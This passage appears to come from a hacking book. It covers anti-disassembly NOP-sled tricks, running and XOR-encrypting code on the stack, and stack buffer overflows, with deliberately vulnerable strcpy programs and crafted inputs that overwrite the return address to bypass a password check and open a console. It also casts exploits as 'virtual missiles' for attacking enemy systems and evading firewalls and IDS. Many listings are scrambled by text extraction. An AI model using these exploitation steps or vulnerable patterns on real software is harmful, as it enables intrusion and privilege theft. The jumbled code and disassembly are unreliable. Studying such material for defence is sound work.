0040111F: 00401120: 00401122: 00401127: 0040112C: 00401131: 90 EB 68 68 68 E8 1E 70 E0 70 8A 11 30 4C 13 40 41 41 00 00 00 00 00 nop jmp push push push call 00401140 401170h 4130E0h 414C70h 004024C0 Now open sechard.eax 685EFC2C 00401136 eax byte ptr [eax-20h].4 0 00405706 00401105 eax.al esp.[ebp-18h] edx ecx. Follow the same step for other NOP sleds also.al 414C70h 004024C0 102 .8 eax.ch byte ptr [ecx].exe in hex editor and bring the cursor at first NOP sled and insert any hex value after the jmp instruction.eax 00401122 0040111A ecx 31187911 ecx al. The new disassembly is as follows: 004010D7: 004010D9: 004010DC: 004010DD: 004010E2: 004010E7: 004010E9: 004010EE: 004010EF: 004010F2: 004010F3: 004010F8: 004010FB: 004010FD: 004010FF: 00401100: 00401102: 00401103: 00401108: 00401109: 0040110B: 0040110C: 0040110D: 0040110F: 00401112: 00401114: 00401119: 0040111A: 0040111C: 0040111E: 00401123: 00401125: 00401126: 00401129: 0040112C: 00401131: 6A 8D 52 B9 E8 EB E8 50 8D 51 E8 83 85 75 90 EB 51 E8 41 00 CC 46 00 83 6A E8 90 EB 85 E8 70 40 00 30 68 E8 15 55 E8 00 4D 41 00 09 03 00 00 02 09 8D 45 E8 4D D4 88 47 00 00 C4 08 C0 23 18 09 68 D8 30 E8 00 C4 04 00 ED 45 00 00 E9 C0 09 EB 1E 68 11 68 41 70 8A E0 00 4C 41 00 13 00 00 push lea push mov call jmp call push lea push call add test jne nop jmp push call inc add int inc add add push call nop jmp test call jo inc add xor push call 15h edx.[ebp-2Ch] ecx 00405880 esp.414D00h 004013F0 004010EB E8859DF7 eax ecx.ch 3 esi byte ptr [eax].
Well friends, the bold hex numbers have replaced all the 0x90s after the jmp instructions, and due to this the disassembled code is mangled and the disassembler produces wrong assembly code. This technique is widely employed, but it is not so hard to crack: hackers are skilled enough to reverse the steps and find out the original disassembly by following the actual execution of the program and replacing the false code with NOP sleds again.
Exporting & Executing Code on Stack

Executing code on the stack has some advantages as well as disadvantages over executing code in the .text section. Code in stack memory can be modified during execution without using WriteProcessMemory, and from a security point of view this increases the immune system of the program. But there are also serious loopholes in executing code on the stack: due to implementation bugs, the execution of the processor can be controlled and an attacker can transfer execution onto user-controlled buffers to execute devastating code.

Relocating code onto the stack has to tackle a few serious problems first. One serious problem is the change in all relative offsets of functions, arguments, and data. The Intel x86 architecture based processors use relative references (offsets) rather than hardcoded addresses. This feature helps maintain the portability and relocatability of software, but it creates a problem if we have to relocate only a small portion of the code during runtime: all the offsets then point to false locations. An offset is calculated by subtracting two memory addresses, that is, by counting the number of bytes between two memory locations. It means that a jump to another location is done by counting the offset bytes from the current location instead of naming an absolute address. When the code is copied to a new location in memory (the stack memory), all relative offsets are copied as they are, but after relocation these offsets point to false positions.

The second problem is hardcoded addresses. After relocation, a hardcoded address still points to the same location, while the code at that position may have changed its location.
The same problem appears when code copied from one program is used in another program: the addresses called in the transported code will point to wrong locations in the program into which it is transplanted.
This is a serious problem for the portability of relocatable code. It can be tackled by using pointers for every variable and function called from within the relocatable code. The best way is to pack the relocatable code inside a function body and provide the pointers of all variables and functions used within the code to this function as its arguments. The program in which this code is reused then provides the relocated function with the new addresses and offsets of the locations called from within the relocated code. Let's study these steps in the next examples.
/* onstack.cpp */
#include <iostream>
using namespace std;

void stackExec(char (*sBuffer), int (*print) (const char *,...))
{
    print(sBuffer);
}

int main (int argc, char* argv[])
{
    char strBuffer[] = "JaiDeva! Learning the memory handling techniques.\n";
    char strBuff[100], codeBuff[500];
    int funcLen, strLen;
    int (*print) (const char *,...);
    void (*stackEx) (char (*), int (*) (const char *,...));
    int (*mainFunc) (int, char **);

    print = printf;
    stackEx = stackExec;
    mainFunc = main;
    funcLen = (unsigned int)mainFunc - (unsigned int)stackEx;
    strLen = strlen(&strBuffer[0]);
    for(int i = 0; i < strLen; i++)
    {
strBuff[i] = strBuffer[i]; strBuff[strLen] = '\0'; for(i = 0; i < funcLen; i++) codeBuff[i] = ((char *)stackEx)[i]; stackEx = (void (*) (char *, int (*) (const char *,...)))&codeBuff[0]; stackEx(strBuff, print); return EXIT_SUCCESS; }
The above code should be compiled with the stack checking calls disabled. We have to disable the stack checking routine chkesp in order to make the program work properly. You can do it using the following command:
CL /Gs onstack.cpp
or by setting the project compilation settings to a final (release) compilation. The chkesp function checks the state of the stack whenever an instruction tries to access the stack memory. A stack protection cookie, or canary, is written at the top of the stack after every write into stack memory; chkesp reads this canary value and matches it against the authoritative canary in the data section. If no match is found, it is considered that the stack is not properly handled and an exception is thrown. This canary value would be written over every buffer we use, whether for code or for data, so while transferring the execution control onto the code at the top of the stack, the processor would try to execute this canary value and the program would crash. Therefore we have to avoid such situations by removing the stack checking routines. Let us discuss the purpose of the above code. The part of the code:
void stackExec(char (*sBuffer), int (*print) (const char *,...))
{
    print(sBuffer);
}
declares the function stackExec with two arguments of pointer type. The first argument *sBuffer is the pointer for the string buffer to be supplied for printing on the screen. The second argument is the function pointer for printf. Now in the next part:
int (*print) (const char *,...); void (*stackEx) (char (*), int (*) (const char *,...)); int (*mainFunc) (int, char **);
We are declaring three function type pointers, which will take the addresses of printf, stackExec, & main respectively as shown below:
print = printf; stackEx = stackExec; mainFunc = main;
Now in the next code line:
funcLen = (unsigned int)mainFunc - (unsigned int)stackEx;
We are calculating the size of stackExec function for copying its machine code into an array buffer on the stack.
strLen = strlen(&strBuffer[0]); for(int i = 0; i < strLen; i++) strBuff[i] = strBuffer[i]; strBuff[strLen] = '\0';
In the above lines of code, we are copying the string from the data section into an array on the stack. We could also use the strcpy function.
for(i = 0; i < funcLen; i++) codeBuff[i] = ((char *)stackEx)[i];
In above code, we are copying the code of function stackExec into an array on the stack from the text section by using its reference (the pointer).
stackEx = (void (*) (char *, int (*) (const char *,...)))&codeBuff[0];
In the above code, the function pointer stackEx is redirected from its earlier reference into the text section to the beginning of the copied code on the stack, by type-casting the address of the first element of the code array on the stack.
stackEx(strBuff, print);
Finally, a call to the function stackExec is made on the stack using its reference (stackEx), with the two pointers provided as arguments for this function. Remember that the printf function is not displaced onto the stack: only its reference is provided and its body remains in the text section, while we have already displaced the string onto the stack.

But there is still a problem with the portability of the code of stackExec in the above program: we cannot export the machine code of the required function and use it in another program. This is because the string used within the function stackExec lies in the local data section, and from there it is transferred onto the stack. In another program where we have to place the code of stackExec, the string would need to be handled explicitly. This kind of situation can be handled by using assembly inserts: we can place the string directly in stack memory, without using the data section. This also helps the portability of the code, which we will discuss in the very next section. Now let's move on to another example utilizing the assembly inserts as follows:
/* assemstack.cpp */
#include <iostream>
using namespace std;

void printString(int (*print) (const char *,...))
{
    __asm
    {
sub esp, 30h mov byte ptr[ebp-2Fh],4Ah mov byte ptr[ebp-2Eh],61h mov byte ptr[ebp-2Dh],69h mov byte ptr[ebp-2Ch],44h mov byte ptr[ebp-2Bh],65h mov byte ptr[ebp-2Ah],76h mov byte ptr[ebp-29h],61h mov byte ptr[ebp-28h],21h mov byte ptr[ebp-27h],20h mov byte ptr[ebp-26h],4Ch mov byte ptr[ebp-25h],65h mov byte ptr[ebp-24h],61h mov byte ptr[ebp-23h],72h mov byte ptr[ebp-22h],6Eh mov byte ptr[ebp-21h],20h mov byte ptr[ebp-20h],74h mov byte ptr[ebp-1Fh],68h mov byte ptr[ebp-1Eh],65h mov byte ptr[ebp-1Dh],20h mov byte ptr[ebp-1Ch],6Dh mov byte ptr[ebp-1Bh],65h mov byte ptr[ebp-1Ah],6Dh mov byte ptr[ebp-19h],6Fh mov byte ptr[ebp-18h],72h mov byte ptr[ebp-17h],79h mov byte ptr[ebp-16h],20h mov byte ptr[ebp-15h],68h mov byte ptr[ebp-14h],61h mov byte ptr[ebp-13h],6Eh mov byte ptr[ebp-12h],64h mov byte ptr[ebp-11h],6Ch mov byte ptr[ebp-10h],69h mov byte ptr[ebp-0Fh],6Eh mov byte ptr[ebp-0Eh],67h mov byte ptr[ebp-0Dh],20h mov byte ptr[ebp-0Ch],74h
        mov byte ptr[ebp-0Bh],65h
        mov byte ptr[ebp-0Ah],63h
        mov byte ptr[ebp-9],68h
        mov byte ptr[ebp-8],6Eh
        mov byte ptr[ebp-7],69h
        mov byte ptr[ebp-6],71h
        mov byte ptr[ebp-5],75h
        mov byte ptr[ebp-4],65h
        mov byte ptr[ebp-3],73h
        mov byte ptr[ebp-2],2Eh
        mov byte ptr[ebp-1],00h
        lea eax, [ebp-2Fh]
        push eax
        call [ebp+08h]
        add esp, 34h
    }
}

int main (int argc, char* argv[])
{
    char codeBuff[1000];
    int (*print) (const char *,...);
    void (*stackMover) (int (*) (const char *,...));
    int (*mainProc) (int, char **);

    print = printf;
    stackMover = printString;
    mainProc = main;
    unsigned int codeLen = (unsigned int)mainProc - (unsigned int)stackMover;

    for(int i = 0; i < codeLen; i++)
        codeBuff[i] = ((char *)stackMover)[i];

    stackMover = (void (*) (int (*) (const char *,...)))&codeBuff[0];
    stackMover(print);
    return EXIT_SUCCESS;
}

Only the prototype of the function printString differs from the earlier example, and the string handling code is also absent from the main section. Let us discuss some important aspects of the assemstack.cpp program.

__asm { }

The __asm keyword is used to insert assembly code in any C/C++ program; we can place assembly instructions inside the braces. Now consider the following instruction:

sub esp, 30h

This instruction allocates 48 bytes (30h is the hex equivalent of decimal 48) on the stack. Remember that the stack grows towards the lower memory addresses; therefore we can allocate space on the stack by subtracting the number of bytes.

mov byte ptr[ebp-2Fh],4Ah
mov byte ptr[ebp-2Eh],61h
mov byte ptr[ebp-2Dh],69h
mov byte ptr[ebp-2Ch],44h
mov byte ptr[ebp-2Bh],65h

The instruction mov byte ptr[ebp-x],y is used to push y onto the stack at an offset of x from the address contained in ebp (at this point ebp and esp contain the same value, because the mov ebp, esp instruction is automatically placed in the prologue of the printString function in the compiled code). Remember that x and y are in hex format. All the above instructions push the letters of the string "JaiDe…" onto the stack. Now the instruction

lea eax, [ebp-2Fh]

loads the address of the first byte of the string "JaiDeva!…" into the eax register.
The lea x, y instruction is used to create in x a pointer to y, where x can be a register. Now the next code looks familiar:

push eax
call [ebp+08h]
add esp, 34h

The push eax instruction pushes the address contained in the eax register (the pointer to the string, created by the lea instruction) as an argument for the function whose address is stored at [ebp+08h]; that address is the pointer to printf. Then the call is made through the address contained at position [ebp+08h]. Finally, the stack clearing is done: the add esp, x instruction removes x bytes (x is in hex) allocated on the stack by the previously called function. Here the number 34h comes from adding the 4 bytes of the address pointer to printf and the remaining 0x30 (48 in decimal) bytes of the string. The rest of the code has the same explanation as the previous onstack.cpp program. The output of assemstack.exe is shown below:
Encrypting & Decrypting Code on Stack

Code encryption is an important security feature employed by software developers to strengthen the immune system of the software itself. In this technique the encrypted machine code is copied to the stack memory, then decrypted back to its original form and executed. This process forces the disassemblers to produce a wrong disassembly of the code, thus leading the hackers down the wrong path. A dedicated hacker can identify such cipher blocks in the code and cannot be stopped, but it may increase the time taken to crack the software and can cause some desperation.

In the next example, we are going to encrypt the machine code of the core function. The process will be completed in a few steps, carried out in high-level code with the help of pointers to the functions. First, we need to calculate the length of the function's machine code. We need the address of the beginning of the function's machine code in the text section for this purpose; we subtract it from the address of the very next function. In the next step, we'll copy the function's machine code into an array, which places the machine code in stack memory. Then the XOR operation is done on the machine code placed on the stack. This encrypts the code and defaces the original machine code. At last the scrambled machine code is written into a disk file, so that it can be transplanted into the program where it is needed.

Note: Hackers utilize the fusion technique for cracking software. They do not just rely on the disassembly of the code, but also follow the actual execution path of the software. This accelerates the process of scrutiny of the software code.

Let us study the example code for encrypting a function's machine code and then writing it into a text file.
44h mov byte ptr[ebp-2Bh]. 30h mov byte ptr[ebp-2Fh].72h mov byte ptr[ebp-17h].20h mov byte ptr[ebp-15h].cpp */ #include <iostream> using namespace std.68h mov byte ptr[ebp-1Eh].68h mov byte ptr[ebp-14h].72h mov byte ptr[ebp-22h].6Eh mov byte ptr[ebp-12h].20h mov byte ptr[ebp-26h].65h mov byte ptr[ebp-1Dh].4Ah mov byte ptr[ebp-2Eh].61h mov byte ptr[ebp-2Dh].79h mov byte ptr[ebp-16h]. void printString(int (*print) (const char *..)) __asm { sub esp.6Eh mov byte ptr[ebp-21h]./*crypta.20h mov byte ptr[ebp-1Ch].20h mov byte ptr[ebp-20h].65h mov byte ptr[ebp-1Ah].6Dh mov byte ptr[ebp-1Bh].65h mov byte ptr[ebp-2Ah]..69h mov byte ptr[ebp-2Ch].6Dh mov byte ptr[ebp-19h].76h mov byte ptr[ebp-29h].61h mov byte ptr[ebp-28h].74h mov byte ptr[ebp-1Fh].21h mov byte ptr[ebp-27h]..65h mov byte ptr[ebp-24h].6Fh mov byte ptr[ebp-18h].61h mov byte ptr[ebp-13h].61h mov byte ptr[ebp-23h].64h { 115 .4Ch mov byte ptr[ebp-25h].
char codeBuff[1000].65h mov byte ptr[ebp-3].2Eh mov byte ptr[ebp-1]...75h mov byte ptr[ebp-4]. i++) codeBuff[i] = ((char *)stackMover)[i]. for(int i = 0. 34h } } void cryptIT() FILE *fp.69h mov byte ptr[ebp-0Fh].6Eh mov byte ptr[ebp-7]. void (*stackMover) (int (*) (const char *.(unsigned int)stackMover.65h mov byte ptr[ebp-0Ah]. crypt = cryptIT.69h mov byte ptr[ebp-6].67h mov byte ptr[ebp-0Dh]..)).. int (*print) (const char *.63h mov byte ptr[ebp-9].. [ebp-2Fh] push eax call [ebp+08h] add esp.6Eh mov byte ptr[ebp-0Eh]. i < codeLen.00h lea eax. { 116 . unsigned int codeLen = (unsigned int)crypt . print = printf..68h mov byte ptr[ebp-8].20h mov byte ptr[ebp-0Ch].74h mov byte ptr[ebp-0Bh].). stackMover = printString.6Ch mov byte ptr[ebp-10h].mov byte ptr[ebp-11h].73h mov byte ptr[ebp-2].71h mov byte ptr[ebp-5]. void (*crypt) ().
(unsigned int)stackMover;

    stackMover = (void (*) (int (*) (const char *,...)))&codeBuff[0];
    stackMover(print);

    fp = fopen("crypta.txt", "a");
    for(i = 0; i < codeLen; i++)
        fputc(((char *)codeBuff)[i] ^ 0x7A, fp);
    fclose(fp);
}

int main (int argc, char* argv[])
{
    cryptIT();
    return EXIT_SUCCESS;
}

The above program can be compiled using the following command:

CL /Gs crypta.cpp

The above program creates a file named crypta.txt and inserts the encrypted machine code of the printString function into it. When crypta.txt is opened in a hex editor it looks like:

Most of the code of crypta.cpp is similar to assemstack.cpp, so let us discuss only the code snippets of crypta.cpp which are not present in assemstack.cpp. The cryptIT function contains most of the code which was placed inside the main function in assemstack.cpp.
In this code the length of the printString function is calculated by subtracting the pointer of printString from the pointer of cryptIT:

    unsigned int codeLen = (unsigned int)crypt - (unsigned int)stackMover;

The pointer to printString (stackMover) is then redefined to the address of the first byte of the machine code of printString on the stack memory, by inserting the address of the first element of the array codeBuff:

    stackMover = (void (*) (int (*) (const char *,...)))&codeBuff[0];

Next, we call the function printString from the stack using its pointer. This call can be omitted; we do it for debugging purposes only:

    stackMover(print);

A text file crypta.txt is created in append mode for inserting the encrypted machine code of the printString function; fp contains the handle to this text file:

    fp = fopen("crypta.txt", "a");

The FOR loop iterates until the counter equals the length of the machine code. In each iteration an element of codeBuff is XORed with 0x7A (that number is chosen so that it should not be present in the code itself, nor will it produce null bytes by XORing with itself). After XORing, the number is written into the text file:

    for(i = 0; i < codeLen; i++)
        fputc(((char *)codeBuff)[i] ^ 0x7A, fp);

The above code is the objective of the crypta.cpp program. Finally, the text file crypta.txt is closed:

    fclose(fp);
char code[]="\x2f\xf1\x96\x29\x2c\x2d\xf9\x96 \x4a\xbc\x3f\xab\x30\xbc\x3f\xa8\x1b\xbc\x3f\xa9\x13\xbc\x3f\xae\x3e\xb c\x3f\xaf\x1f\xbc\x3f\xac\x0c\xbc\x3f\xad\x1b\xbc\x3f\xa2\x5b\xbc\x3f\x a17\xbc\x3f\x9f\x1f\xbc\x3f\x9c\x1 7\xbc\x3f\x9d\x15\xbc\x3f\x92\x08\xbc\x3f\x93\x03\xbc\x3f\x90\x5a\xbc\x 3c\x19\xbc\x3f\x8d\x12\xbc\x3f\x8 2\x14\xbc\x3f\x83\x13\xbc\x3f\x80\x0b\xbc\x3f\x81\x0f\xbc\x3f\x86\x1f\x bc\x00". The code is as shown in next block: \x2f\xf1\x96\x29\x2c\x2d\xf9\x96\x4a\xbc\x3f\xab\x30\xbc\x3f\xa8\x1b\xb c\x3f\xa9\x13\xbc\x3f\xae\x3e\xbc\x3f\xaf\x1f\xbc\x3f\xac\x0c\xbc\x3f\x ad\x1b\xbc\x3f\xa2\x5b\xbc\x3f\xa1 7\xbc\x3f\x9f\x1f\xbc\x3f\x9c\x17\xbc\x3f\x9d\x15\xbc\x3f\x92\x08\xbc\x 3f\x93\x03\xbc\x3f\x90\x5a\xbc\x3 c\x19\xbc\x3f\x8d\x12\xbc\x3f\x82\x14\xbc\x3f\x83\x13\xbc\x3f\x80\x0b\x bc\x3f\x81\x0f\xbc\x3f\x86\x1f\xbc Let us use this code into another program.)).txt into a hex editor and copy the hex dump into WordPad and replace all the blank spaces with “\x” this is the encrypted machine code of the function printString. only then the decrypted code will execute.. /* decrypta. { 119 . char* argv[]) char codeBuffer[1000]. int (*print) (const char *. int main (int argc. print = printf. But we need to decrypt the machine code first. which can be used in any program..)...Open the crypta... void (*printString) (int (*) (const char *.cpp */ #include <iostream> using namespace std.
    int codeLen = strlen(&code[0]);

    // Instead of next very FOR loop strcpy function can also be used here.
    for (int i = 0; i < codeLen; i++)
        codeBuffer[i] = code[i];

    for (i = 0; i < codeLen; i++)
        codeBuffer[i] = codeBuffer[i] ^ 0x7A;

    printString = (void (*) (int (*) (const char *,...))) &codeBuffer[0];
    printString(print);

    return EXIT_SUCCESS;
}

When the XOR operation is carried out on the encrypted buffer again using the same XOR key (in this case the key is 0x7A), the original machine code of the printString function is retrieved. Then a function pointer is created by inserting the address of the first byte of codeBuffer into the function pointer. The address of the printf function is provided to this retrieved machine code as a function argument, and the code is executed by calling its pointer. The result is shown below.
This is the technique mostly used by protection developers. The technique works better if the encrypted machine code is kept in the .text section (code section) instead of the data section, where it is hard to identify at first sight, because it will force the disassembler to produce false assembly in the disassembled code. This can be achieved by using assembly inserts, or by inserting a NOP sled of the same size as the encrypted code into the program and then changing this NOP sled into the encrypted code using a hex editor.

The degree of strength can be increased by inserting the NOP sled inside a naked function. A naked function does not have any prologue or epilogue. A typical naked function definition is shown below:

void __declspec (naked) nakFunct()
{
    cout << "This is the naked function example." << endl;
}
Buffer Overflow Attack

As the name defines itself, the overflow in assigned memory is termed a buffer overflow. Buffer overflow bugs are the result of developers' underestimation of the required amount of memory buffers for input. These bugs can be exploited, and the attacker can get administrative or root privileges locally or remotely.
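The underestimation described above can be made concrete with a tiny sketch. safeCopy is a hypothetical helper, not from the book: it performs the capacity check that a plain strcpy omits, truncating over-long input instead of letting it spill past the buffer.

```cpp
#include <cstring>
#include <cstddef>

// Hypothetical bounded copy: the caller passes the real capacity of the
// destination buffer. An unchecked strcpy would keep writing past the end
// when the source is longer; here the input is truncated instead and the
// caller is told that an overflow was attempted.
bool safeCopy(char *dst, std::size_t dstSize, const char *src)
{
    if (std::strlen(src) >= dstSize)
    {
        std::strncpy(dst, src, dstSize - 1); // copy only what fits
        dst[dstSize - 1] = '\0';             // strncpy may not terminate
        return false;                        // overflow was attempted
    }
    std::strcpy(dst, src);
    return true;
}
```

Every overflow exploited in the following pages exists because a copy like this was done without the size check.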
Rocket & Missile Theories & Manufacturing

In this section we are going to deal with rockets, missiles, satellites & highly sophisticated virtual code bombs, which can be more destructive than real bombs and missiles. Well friends, army and defense services use this technology to break in to enemy warhead computer systems, or to hack down enemy defense service systems and collect secret information, or to de-arm the enemy. It is possible to neutralize or control the system controlling the missiles or other security equipment with our virtual missiles & payload. This part of hacking science is a specialty of the US army and other western defense & intelligence research & design services & agencies. We also need to be strong in this field. But remember, just as the enemy has RADAR systems, there are firewalls & IDS in victim systems; so just like stealth missiles and RADAR-defeating technologies there are techniques to bypass firewalls & IDS, to land in victim systems and do the job in stealth mode, undetected. Isn't it interesting? Friends! In the next sections we will be discussing the techniques to develop such virtual missiles and target-scanning bombs, called in hacking society the injection vector and payloads. Just keep on reading…

A major portion of vulnerabilities is constituted by buffer overrun vulnerabilities. Buffer overflow bugs are architectural and platform independent. To effectively understand and exploit this bug, a deep understanding of the memory allocation mechanism is required. Basically, a buffer overflow attack works by overwriting the EIP (Extended Instruction Pointer) register. Every time a function call occurs, before jumping into the function code, the address of the instruction next to the calling instruction is saved on the stack as the return address, so that when the function finishes its job (ret instruction), it will return to that address by placing the saved return address in the EIP register. We cannot write the EIP directly, but an indirect approach is used: if we overwrite this saved copy of the return address, we'll be controlling the processor as we wish.
But remember that the different memory sections have attributes assigned to them. The .text section is always executable, and the BSS section holds the execute attribute by default. So if we are placing shellcode (attacker-supplied machine code), it must be placed in a section having write and execute attributes, or we must overwrite the return address with one lying in a section bearing the execute attribute. Shellcode is the opcode (operational code) that provides a shell or a command console of the victim system that is actually not permitted to the attacker. It can be achieved by overflowing the buffer.

Consider an array buffer of 20 bytes named userName[20]. Now, if anyone accidentally or intentionally inserts more than 20 characters into this array (19 username characters + 1 null termination), it will exceed its boundary limit and cause a buffer overrun: the input buffer will spawn over the important structures & code of the software, damaging the structure of the software and crashing the program. But if a carefully crafted buffer is supplied to userName[20], then the executional flow of the software can be controlled by the attacker, leading to the execution of the attacker's supplied arbitrary code.

We'll slowly move with examples from lower potential to high potential risk for security using shellcode. Consider the following program:

/* overflow.cpp */
#include <iostream>
using namespace std;

int main (int argc, char* argv[])
{
    char name[15];

    if ( argc < 2)
    {
        fprintf (stderr, "Usage:\n%s <string>", argv[0]);
        exit(-1);
    }

    cout << "This is a buffer overflow example." << endl;
    cout << "If string buffer will exceed 15 bytes, it will cause an overflow." << endl;

    //----------------buffer overflow section code------------
    strcpy (name, argv[1]);
    //-----------------buffer overflow section end------------

    system("PAUSE");
    return EXIT_SUCCESS;
}

Compile this program and run it. This program runs normally with no side effects as long as the user-supplied string is lower than 15 bytes in size. But when the string size increases beyond the buffer limit, the string bytes start overwriting the important structures in stack memory and cause a buffer overflow. We executed it, check it out:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\access denied\code\Debug>overflow
Usage:
overflow <string>

C:\access denied\code\Debug>overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
This is a buffer overflow example.
If string buffer will exceed 15 bytes, it will cause an overflow.
Press any key to continue . . .

When we run the program normally it runs normally, but when the string exceeds the buffer limit an overflow occurs, and when we pressed Enter it popped out the well-known "Send error report" dialogue, showing that some error has occurred. When we pressed "Debug" and then "OK", the dump of the registers was clearly presented to us, as shown in the figure below. Just check out the EIP and EBP registers' values, which are marked in a circle.
The EIP and EBP have both got 0x41414141. Well, 0x41 is the hex equivalent of 65 in decimal, which is the ASCII code of "A". In the above example, the buffer string "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" is clearly unfit for a 15-byte buffer; it spawned over the structure of the program code and overwrote the values to be loaded into the EIP and EBP registers. Remember from the registers discussion that the EIP register contains the address of the executing instruction code. When the processor executes the ret instruction before exit, it has to return to the address which is contained in EIP. But during the copying process that saved address was changed by us intentionally: we filled the EIP with 0x41414141. Thus it jumped to execute the instruction at 0x41414141. But it found nothing there, therefore an exception was raised. But how to exploit this situation? The answer is EIP!!! Yes, the EIP register. If we change the EIP value to an address where we have put executable instructions in hex format, then the processor must execute them.
First of all, let's study some of the simple ways to trick the program execution. For the sake of simplicity, compile the program by avoiding the stack-checking calls, using /Gs with CL:

C:\Access denied\code>CL /Gs overflow.cpp

This will simplify the learning process by avoiding the stack protection calls when accessing the stack. We will also learn the ways to thwart the stack protection mechanism in later discussions. CL will compile and create the exe file in the same directory in which overflow.cpp exists. It is advised to copy the newly created overflow.exe to another directory and then analyze the newly copied file, to avoid the debugger automatically finding the source code by default; otherwise alter the settings of the debugger.

Think: we can redirect the execution of 'main' back to the 'main' function. We checked the disassembly of overflow.exe and found the address of main to be 0x0040107E. Thus we got the address "40107E", equal to "~^P@" (don't include the inverted commas): 0x7E is the hex equivalent of 126 in decimal (check with a calculator) and 126 is the ASCII code for "~". In the same way "^P" is equivalent to 0x10 in hex, which is 16 in decimal, and the last 0x40 is the hex of 64 in decimal, which in turn is "@". Therefore we crafted the string as "AAAAAAAAAAAAAAAAAAAA~^P@" and injected it into overflow.exe. The string "AAAAAAAAAAAAAAAAAAAA~^P@" has two parts: the first part is "AAAAAAAAAAAAAAAAAAAA" and the second part is "~^P@". The second part is actually the address of the main function, i.e. "40107E", in reverse order: 7E 10 40. The output we got is as shown below. We executed it twice, wow!!!

C:\access denied\code\Debug\dump>overflow AAAAAAAAAAAAAAAAAAAA~^P@
This is a buffer overflow example.
If string buffer will exceed 15 bytes, it will cause an overflow.
This is a buffer overflow example.
If string buffer will exceed 15 bytes, it will cause an overflow.

Note: Use the ALT + Numeric Keypad to frame the above example address
Press any key to continue .
Alt + 126 will print ~, Alt + 16 will print ^P and Alt + 64 will print @ in the string. This is just an introduction to the way in which buffer overflow bugs are exploited. Now let's proceed with another example. In the next software, we will be authenticating a password: if it matches, the program will start a command console; otherwise it will show a login-failed message and terminate.

Before indulging deeply into this discussion, we must learn some basics of the structure of memory, its allotment and management. Buffer overflows are of two types: heap dereferencing and stack overflow. Firstly, we will study the stack-based buffer overflows. The following figure will clear up some basics about the stack memory structure. The Stack Base Pointer contains the address of the base of the stack frame for this very function. This address is the top of the stack of the calling routine. Remember, after the completion of the function, depending upon the calling conventions, this stack frame will get cleared out.
/* seconsol.cpp */
#include <iostream>
#include <process.h>
using namespace std;

void consolFunc (void)
{
    system("START");
}

int main (int argc, char* argv[])
{
    // argc represents the number of command-line arguments including
    // program name.
    // argv[] is a pointer array and argv[0] represents the program name,
    // argv[1] represents the first command-line argument,
    // argv[2] represents the second command-line argument and so on.
    char password[] = "iAMsatisfied";  // the registered password.
    char passBuffer[21];  // remember 20 bytes for string & 21st byte for NULL termination.

    if ( argc < 2)
    {
        // this section will get control if command-line argument will be missing.
        fprintf (stderr, "Usage:\n%s <password21>", argv[0]);
        exit (-1);  // exit with error (non-zero integer means error)
    }

    strcpy(passBuffer, argv[1]);

    if (strcmp (password, passBuffer) == 0)
    {
        consolFunc();
        goto EXIT;
    }
    else
    {
        cout << "Login failed." << endl;
    }

EXIT:
    return EXIT_SUCCESS;
}
Compile the above program as:

CL /Gs seconsol.cpp

And disassemble it using dumpbin /disasm, redirecting its output to a text file in the dump directory, as shown below:

C:\code>dumpbin /disasm seconsol.exe >dump\seconsolx.txt

Let's execute seconsol.exe and check it for proper security. Well, everything is working properly: using the password 'iAMsatisfied' it opens a command console, but shows a 'Login failed' message if a wrong password is supplied. Now pass it a much bigger string than its buffer limit. Yes! The overflow occurs and the EIP can be overwritten. Let's see what happens.

The address of the string "START" can be known from the .data section using:

dumpbin /section:.data /rawdata:bytes seconsol.exe

We found it is 0x0040E0A0; therefore, search for 40E0A0 in the disassembly code file. OK friends, now check out the disassembled text file for the address of the code referencing the string "START". It comes out to be 0x00401081, but we can also start from the beginning of the function at 0x0040107E, as you wish.

Now check out the number of bytes it takes to overwrite the saved return address to be loaded into the EIP register, and after that number of bytes place the ~^P@ (0x0040107E, but in reverse order, as 7E 10 40; in decimal it is equal to 126 16 64 — now press all numbers in the numeric keypad along with the 'Alt' key: alt + 126, alt + 16, alt + 64; or directly from the keypad [remember that ^P is not "shift + 6 and then P" but "ctrl + P"]). As shown below:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\access denied\code>seconsol
Usage:
seconsol <password21>
C:\access denied\code>seconsol AAAAAAAAAAAAAAAAAAAAAAAAAAAA~^P@
Login failed.

C:\access denied\code>

In the last attempt the message shown is "Login failed.", but it opens the command console. Note: "Login failed" is shown because the strcmp() function works properly and returns an error; but as we overflowed the saved return address, we were able to bypass the password check (even though the check is done properly), and when the main function executes the ret instruction of its own epilogue, the changed saved return address gets loaded into the EIP & execution is transferred to this address location.
Overflow with Custom Machine Code

Well friends, until this point we were only redirecting the process within itself. Now it's time to do something different. By this we mean to trespass the EIP so that the processor will run the code supplied by us in a buffer. But processors do not understand higher-level code, so we have to supply the buffer with machine instructions directly. The method we are going to follow is called the Fusion Technique. We'll discuss different techniques to develop shellcode for Windows as well as for Linux systems in forthcoming discussions.

Some important technical terms:

Fusion Technique: In this technique we write small, self-contained, self-sufficient program snippets in C++. It does not mean that we need to write full-fledged assembly programs and need an assembler; instead, we write the assembly instructions within __asm { assembly code } in any C++ program and compile the code. Then, with the help of a disassembler, we identify the code in the whole program and copy the hex equivalents of the assembly instructions from a hex editor. This technique is very easy and doesn't require learning the whole structure of assembly programming, and it will be quite helpful in writing full-fledged shellcode.

Shellcode: The block of opcode designed especially to provide a command shell or desired results by injecting this code into a vulnerable application. All in all, it's code returning a shell.

NOP Sled: NOP means no operation; its hex is 0x90 (144 in decimal). A block of 0x90 instructions just directs the processor to jump on to the next instruction. A NOP sled is a run of such instructions used to fill the buffers where no useful processing is needed. Note: Security systems like firewalls or intrusion detection systems detect unprintable bytes in the data packets and, if found, filter them out, therefore
foiling the attack plan. Therefore, to thwart such filtration of shellcode, we have to transform the shellcode into printable character format. We shall discuss this later in the shellcode section.

A NOP sled is helpful in buffer overflow exploits where we are not certain about the exact address of the beginning of the buffer containing the shellcode. In such a situation the NOP sled is filled in at the beginning of the shellcode-containing buffer, so that the saved return address may intersect any of the addresses inside the NOP sled and thus the execution will be bridged to the shellcode.

